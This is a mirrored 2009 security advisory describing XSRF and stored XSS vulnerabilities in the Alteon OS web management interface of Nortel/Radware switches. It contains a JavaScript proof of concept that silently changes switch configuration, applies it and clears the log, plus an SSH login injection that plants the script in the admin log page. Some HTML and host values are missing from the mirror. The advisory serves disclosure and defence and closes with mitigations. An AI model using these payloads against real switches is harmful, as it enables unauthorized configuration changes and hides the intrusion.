AOH :: HP Unsorted A :: BT-21990.HTM

Alteon OS BBI (Nortell) - Multiple Vulnerabilities



Alteon OS BBI (Nortell) - Multiple Vulnerabilities
Alteon OS BBI (Nortell) - Multiple Vulnerabilities



Digital Security Research Group [DSecRG] Advisory
http://dsecrg.com/pages/vul/show.php?id=161 

Various XSS and XSRF vulnerabilities were identified in the  Alteon OS Browser-Based
Interface (BBI).

Application:             Alteon OS BBI
Versions Affected:       <= 21.0.8.3  and may be higher ( <=25.1.0.0 )
Vendor URL: http://www.nortelnetworks.com; http://radware.com 
Bug:                     XSS ans XSRF Vulnerabilities
Exploits:                YES
Reported:                11.08.2009
Secondly Reported:       07.09.2009
Final Reported:          28.10.2009     
Date of Public Advisory: 16.11.2009 
Solution:                YES (Non official)
Author:                  Sintsov Alexey from Digital Security Research Group [DSecRG]


Description
***********

Browser-Based Interface (BBI) software is included in the Nortel Networks(vesrions < 25.0.0.0) and Radware
family of  switches. The BBI software lets you use your Web browser to access switch
information and  statistics, to perform switch configuration via the Internet. This
vulnerabilities allow remote attackers to change the switch configuration.


Details:
*******

1) XSRF

An attacker may exploit this issue to perform certain administrative actions,
e.g. change  using predictable URL requests once the user has authenticated and
obtained a valid session  with the switch.


Example
*******

PoC (Change banner and apply):




Nortel XSRF



 
 






2)  Stored XSS 

An attacker may inject 36 bytes of JavaScript code into log via SSH login
parameter.   Login parameter will be written into log as is. BBI or telnet login parameter
does not write  into log - only SSH. And when log page will be generated all input
from SSH login parameter will be displayed as is. 

Both vulnerabilities give chance to change switch configuration file or attack Administrator's 
workstation. A possibility of  embedding a code into a log without authentication increases
attacker's chance to succeed.

Also any string parameters in BBI can be used for static XSS. 


Example
*******

Crete JavaScript code and put it on evil server (inj.js), this code will
change switch banner in  current configuration, apply this change and clear log:

Proof of Concept:


var request = !window.ActiveXObject ? new XMLHttpRequest() : new
ActiveXObject("Microsoft.XMLHTTP");

//Change banner
request.open("GET",
"http:///switchSystem.html/bar?banner=thx2Kononenko", false); 
request.send(null);

        
request = !window.ActiveXObject ? new XMLHttpRequest() : new
ActiveXObject("Microsoft.XMLHTTP");

//apply changes
request.open("GET", "http:///TopToolArea.html?actionState=apply", 
false);
request.send(null);

request = !window.ActiveXObject ? new XMLHttpRequest() : new
ActiveXObject("Microsoft.XMLHTTP");

//Clear log
request.open("GET", "http:///clearLog.html", false); 
request.send(null);


Attacker can include this code into log  without use of . 
But this way faster.

Next step - connect via SSH and inject parts of code.

Exploit:

alexey@shell#:ssh 

login as: 
">@'s password:
Access denied^C

        
        When administrator have a look into log via BBI, his browser get that:

...
Jul  3 13:12:44  NOTICE  mgmt: Failed login attempt via SSH from host
, user 
Solution: ********* We have no answer from Radware about two month. So we don't know about this vuln. in versions 25.0.1.0 - 25.1.0.0. Here are our recommendations: a) Turn off BBI. b) Change default SSHd port. /c/sys/access/https/https d /c/sys/access/http d /c/sys/access/sshd/sshport 42 c) Allow access to SSH and BBI only for trusted machines and networks; References ********** http://dsecrg.com/pages/vul/show.php?id=161 About ***** Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact: research [at] dsecrg [dot] com http://www.dsecrg.com

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.